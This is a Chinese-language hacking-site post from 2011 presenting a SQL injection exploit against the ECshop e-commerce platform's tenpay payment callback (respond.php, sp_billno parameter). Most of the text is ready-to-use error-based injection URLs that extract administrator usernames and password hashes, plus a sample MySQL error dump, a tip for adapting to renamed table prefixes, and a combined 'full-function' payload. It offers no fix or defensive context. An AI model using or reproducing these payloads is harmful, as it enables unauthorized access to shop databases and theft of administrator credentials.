热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

ECshop 支付方式0day手工注射 EXP

发布时间:2011-01-16 22:45文章来源:黑白前线文章作者:udb311 点击次数:
摘要:图文:黑白过客 主题:ECshop 支付方式0day手工注射的研究 原EXP为: respond.php?code=tenpayattach=vouchersp_billno=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_us...

图文:黑白过客

主题:ECshop 支付方式0day手工注射的研究

 

原EXP为:

respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select

(select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

and 1=1
 

 

漏洞具体见:http://www.hackline.net/a/news/ldfb/web/2011/0105/7877.html

 

一直无法手工注入得到用户与密码。

 

经过牛人的指点后,我成功得到的返回用户和密码字段的exp

暴用户名:

http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
 

暴密码:

http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20password%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
 

如果表前缀被改如下所示:

MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT log_id FROM `aimeili`.`aml_pay_log` WHERE order_id=1 and(select 1 from(select count(*),concat((select (select (SELECT password FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 AND order_type=1 ) [2] => Array ( [error] => Table 'aimeili.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
 

只要修改ecs_admin_user为aml_admin_user即可

 

有图有真像
 

 



 

最后感谢神牛Luc1f3r

 

 

2010-01-30补充

全功能EXP:

respond.php?code=tenpay&attach=voucher&sp_billno=1%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23


 

标签分类:

上一篇:Theol网络教学综合平台GetWebShell并提权漏洞
下一篇:HTAdmin默认配置进行入侵